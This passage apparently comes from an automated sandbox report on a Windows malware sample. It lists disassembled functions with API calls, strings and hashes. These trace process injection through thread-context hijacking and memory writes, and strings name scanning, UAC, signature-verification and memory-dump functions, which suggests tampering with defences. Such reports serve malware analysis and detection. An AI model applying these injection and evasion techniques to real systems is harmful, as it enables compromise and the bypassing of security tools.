                      • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0286A992
                      • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0286A9A4
                      • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0286A9B6
                      • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0286A9C8
                      • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0286A9DA
                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0286A9EC
                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0286A9FE
                      • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0286AA10
                      • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0286AA22
                      • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0286AA34
                      • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0286AA46
                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0286AA58
                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0286AA6A
                      • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0286AA7C
                      • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0286AA8E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                      • API String ID: 667068680-597814768
                      • Opcode ID: bf7256b9bdcb1c0e0094e90850c9b2d39abea818be30077d7e1cee1dae7f9211
                      • Instruction ID: cd81cb43b27d2f97d1da9a350a1536b97d53bfb100a10d6b403dc0726880fc79
                      • Opcode Fuzzy Hash: bf7256b9bdcb1c0e0094e90850c9b2d39abea818be30077d7e1cee1dae7f9211
                      • Instruction Fuzzy Hash: 8331AEBCA807319FEB45EFB8D9E9A3637E9EF057027400969A801DF249E77894108F52
                      Function 02868BA8 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0286881C: LoadLibraryA.KERNEL32(00000000,00000000,02868903), ref: 02868850
                        • Part of subcall function 0286881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02868903), ref: 02868860
                        • Part of subcall function 0286881C: GetProcAddress.KERNEL32(74B20000,00000000), ref: 02868879
                        • Part of subcall function 0286881C: FreeLibrary.KERNEL32(74B20000,00000000,028B2388,Function_000065D8,00000004,028B2398,028B2388,000186A3,00000040,028B239C,74B20000,00000000,00000000,00000000,00000000,02868903), ref: 028688E3
                      • GetThreadContext.KERNEL32(00000000,028B2420,ScanString,028B23A4,0286A774,UacInitialize,028B23A4,0286A774,ScanBuffer,028B23A4,0286A774,ScanBuffer,028B23A4,0286A774,UacInitialize,028B23A4), ref: 0286943A
                        • Part of subcall function 02867CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02867D6C
                      • SetThreadContext.KERNEL32(00000000,028B2420,ScanBuffer,028B23A4,0286A774,ScanString,028B23A4,0286A774,Initialize,028B23A4,0286A774,00000000,-00000008,028B24F8,00000004,028B24FC), ref: 0286A14F
                      • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,028B2420,ScanBuffer,028B23A4,0286A774,ScanString,028B23A4,0286A774,Initialize,028B23A4,0286A774,00000000,-00000008,028B24F8), ref: 0286A15C
                        • Part of subcall function 02868798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028B23A4,0286A3BF,ScanString,028B23A4,0286A774,ScanBuffer,028B23A4,0286A774,Initialize,028B23A4,0286A774,UacScan), ref: 028687AC
                        • Part of subcall function 02868798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028687C6
                        • Part of subcall function 02868798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028B23A4,0286A3BF,ScanString,028B23A4,0286A774,ScanBuffer,028B23A4,0286A774,Initialize), ref: 02868802
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Library$Thread$AddressContextFreeLoadProc$HandleMemoryModuleResumeVirtualWrite
                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                      • API String ID: 4175202198-51457883
                      • Opcode ID: 249e2c1a48884cd029a8496ee401e29377e5f94459d3028f51fd6849ca87f5e2
                      • Instruction ID: 6ec2b717a5f4fb2e221b5a45932ddf66cec7468eb8eadb79ab8da824a475a7e7
                      • Opcode Fuzzy Hash: 249e2c1a48884cd029a8496ee401e29377e5f94459d3028f51fd6849ca87f5e2
                      • Instruction Fuzzy Hash: 6BE23E3CA501298FDB15EF68CC94BEE73FABF84300F1041A1A949EB215DA74DE859F52
                      Function 02868BA6 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0286881C: LoadLibraryA.KERNEL32(00000000,00000000,02868903), ref: 02868850
                        • Part of subcall function 0286881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02868903), ref: 02868860
                        • Part of subcall function 0286881C: GetProcAddress.KERNEL32(74B20000,00000000), ref: 02868879
                        • Part of subcall function 0286881C: FreeLibrary.KERNEL32(74B20000,00000000,028B2388,Function_000065D8,00000004,028B2398,028B2388,000186A3,00000040,028B239C,74B20000,00000000,00000000,00000000,00000000,02868903), ref: 028688E3
                      • GetThreadContext.KERNEL32(00000000,028B2420,ScanString,028B23A4,0286A774,UacInitialize,028B23A4,0286A774,ScanBuffer,028B23A4,0286A774,ScanBuffer,028B23A4,0286A774,UacInitialize,028B23A4), ref: 0286943A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Library$AddressContextFreeHandleLoadModuleProcThread
                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                      • API String ID: 1116111917-51457883
                      • Opcode ID: ba047339597340717074daaeef836e2ef1157bfae6e2b7984e64cb29b3f914d3
                      • Instruction ID: 19c262051ef7ab097f31c61fd34c52075041859938510b0c68a8d63b2108fc1e
                      • Opcode Fuzzy Hash: ba047339597340717074daaeef836e2ef1157bfae6e2b7984e64cb29b3f914d3
                      • Instruction Fuzzy Hash: 43E23E3CA501298FDB15EF68CC94BEE73FABF84300F1041A1A949EB215DA74DE859F52
                      Function 028558B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(kernel32.dll,02856BC8,02850000,0287E790), ref: 028558D1
                      • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028558E8
                      • lstrcpynA.KERNEL32(?,?,?), ref: 02855918
                      • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02856BC8,02850000,0287E790), ref: 0285597C
                      • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02856BC8,02850000,0287E790), ref: 028559B2
                      • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02856BC8,02850000,0287E790), ref: 028559C5
                      • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02856BC8,02850000,0287E790), ref: 028559D7
                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02856BC8,02850000,0287E790), ref: 028559E3
                      • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02856BC8,02850000), ref: 02855A17
                      • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02856BC8), ref: 02855A23
                      • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02855A45
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                      • String ID: GetLongPathNameA$\$kernel32.dll
                      • API String ID: 3245196872-1565342463
                      • Opcode ID: fc23abc29e07de56c374af2216af964bd80183c5971cd5f4db07089fe8a37d45
                      • Instruction ID: 2ecb67da340d402d64881631607c8392370a19dd55f31cc0a057653d190bea68
                      • Opcode Fuzzy Hash: fc23abc29e07de56c374af2216af964bd80183c5971cd5f4db07089fe8a37d45
                      • Instruction Fuzzy Hash: 7F417F7DD00269AFDB10DAE8CC88BDEB7BEAF08340F4445A5A948E7241D7389B448F50
                      Function 02855B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                      Download Yara Rule
                      APIs
                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02855B94
                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02855BA1
                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02855BA7
                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02855BD2
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02855C19
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02855C29
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02855C51
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02855C61
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02855C87
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02855C97
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                      • API String ID: 1599918012-2375825460
                      • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                      • Instruction ID: ed4a6ea50121edde178e9a6d001c83e9a115e6fb67681cad4a3d0340b15d167b
                      • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                      • Instruction Fuzzy Hash: B731877DE4023C6AFB25D6B89C49FDFB7BD5B04380F4401E19A08E6181EB789E848F52
                      Function 02868798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028B23A4,0286A3BF,ScanString,028B23A4,0286A774,ScanBuffer,028B23A4,0286A774,Initialize,028B23A4,0286A774,UacScan), ref: 028687AC
                      • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028687C6
                      • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028B23A4,0286A3BF,ScanString,028B23A4,0286A774,ScanBuffer,028B23A4,0286A774,Initialize), ref: 02868802
                        • Part of subcall function 02867CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02867D6C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                      • String ID: BCryptVerifySignature$bcrypt
                      • API String ID: 1002360270-4067648912
                      • Opcode ID: 1d36545479db41b1c5625e9a2323d076f2ac2d68fb41534610403492343f5431
                      • Instruction ID: ef323e4a2788462f173992f0850cc922d243a5ae62ecfcefa93257051e67e1f4
                      • Opcode Fuzzy Hash: 1d36545479db41b1c5625e9a2323d076f2ac2d68fb41534610403492343f5431
                      • Instruction Fuzzy Hash: 66F0AF7DA802249EE312AA69AC48F6637DCB78A315F0C092EBD0ECB2E4D77408148B50
                      Function 0286DF00 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 02854ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02854EDA
                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0286DFD2), ref: 0286DF3F
                      • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0286DF79
                      • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0286DFA6
                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0286DFAF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                      • String ID:
                      • API String ID: 3764614163-0
                      • Opcode ID: 700e33c91148180bcb147877a0412ab906ccceec582eb81a95e47b47860685a0
                      • Instruction ID: 402f3b21e5b97ac14f54955d756d5803cc75b53d7f62e56bb19f489cbd630ca0
                      • Opcode Fuzzy Hash: 700e33c91148180bcb147877a0412ab906ccceec582eb81a95e47b47860685a0
                      • Instruction Fuzzy Hash: AF21F179B40318BEEB20EAE4CC46FAEB7BDDB04B00F504561B604FB1D0D7B46E048A96
                      Function 0286DE24 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                      Download Yara Rule
                      APIs
                      • RtlInitUnicodeString.NTDLL(?,?), ref: 0286DEA0
                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0286DEF2), ref: 0286DEB6
                      • NtDeleteFile.NTDLL(?), ref: 0286DED5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Path$DeleteFileInitNameName_StringUnicode
                      • String ID:
                      • API String ID: 1459852867-0
                      • Opcode ID: 7f4869f168869c62e43f020dce931f3ddc7ebaa4ada3ab4516d04c724069172f
                      • Instruction ID: 5cd15c635505328ac3dca59fda871316c07b5f4fd21f866dd0e2d0addc2df348
                      • Opcode Fuzzy Hash: 7f4869f168869c62e43f020dce931f3ddc7ebaa4ada3ab4516d04c724069172f
                      • Instruction Fuzzy Hash: B701867EB443486EEB05EBE4CD85BED77BDAB64704F5100E29200E6092DB746B088B22
                      Function 0286DE78 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 02854ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02854EDA
                      • RtlInitUnicodeString.NTDLL(?,?), ref: 0286DEA0
                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0286DEF2), ref: 0286DEB6
                      • NtDeleteFile.NTDLL(?), ref: 0286DED5
                        • Part of subcall function 02854C0C: SysFreeString.OLEAUT32(0286ED84), ref: 02854C1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                      • String ID:
                      • API String ID: 1694942484-0
                      • Opcode ID: fd30b3c732170351ebd8ca7e139e6809aef675a2e10b5a9777ed04babeb91092
                      • Instruction ID: 6e80ebdc099341695187ec96f0fbccdd2209b5426c6b15742c646c31dd27b5fd
                      • Opcode Fuzzy Hash: fd30b3c732170351ebd8ca7e139e6809aef675a2e10b5a9777ed04babeb91092
                      • Instruction Fuzzy Hash: 2101FF7DA40208BAEB11EBE4CD46FDEB7FDEB58700F5144B1A604E2580EB74AB048A65
                      Function 02857F54 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                      Download Yara Rule
                      APIs
                      • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02857F75
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: DiskFreeSpace
                      • String ID:
                      • API String ID: 1705453755-0
                      • Opcode ID: 0fbec54a0c02fd547ee90df4e96e63df58f4455ae2e88ae87e717fe42b60fd3b
                      • Instruction ID: 59bdc8ce9704f40ad4905f4b044f044fcd5707ba0acb2095ee9e9e30d9b833a0
                      • Opcode Fuzzy Hash: 0fbec54a0c02fd547ee90df4e96e63df58f4455ae2e88ae87e717fe42b60fd3b
                      • Instruction Fuzzy Hash: 821100B5A00209AF9B04CF99C8809EFF7F9EFC8304B54C569A909EB254E6319A018B90
                      Function 0285A744 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                      Download Yara Rule
                      APIs
                      • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0285A762
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: InfoLocale
                      • String ID:
                      • API String ID: 2299586839-0
                      • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                      • Instruction ID: 4972bfc3084c4cb9bc77423c4175f8b66a5d282f19bbaece811d37ace2a7778a
                      • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                      • Instruction Fuzzy Hash: 9DE0923D70022817D315A96C9C809E673AD9758350F00426AAD49C7341FDA09E844AE9
                      Function 0285B70C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                      Download Yara Rule
                      APIs
                      • GetVersionExA.KERNEL32(?,0287D106,00000000,0287D11E), ref: 0285B71A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Version
                      • String ID:
                      • API String ID: 1889659487-0
                      • Opcode ID: 744ddc2d7fea2942684bca39bbe956b6a150a627fd9a4e225a0329015fddb07d
                      • Instruction ID: 4f771f591b66aa0b93190a8399b852d624687fc189a1d9bccbbafa61707cbc48
                      • Opcode Fuzzy Hash: 744ddc2d7fea2942684bca39bbe956b6a150a627fd9a4e225a0329015fddb07d
                      • Instruction Fuzzy Hash: 30F0127C9083118FD340DF28D544A1677E9FB48B88F408DA8EA98C73A0E734D828CF52
                      Function 0285A790 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                      Download Yara Rule
                      APIs
                      • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0285BDF2,00000000,0285C00B,?,?,00000000,00000000), ref: 0285A7A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: InfoLocale
                      • String ID:
                      • API String ID: 2299586839-0
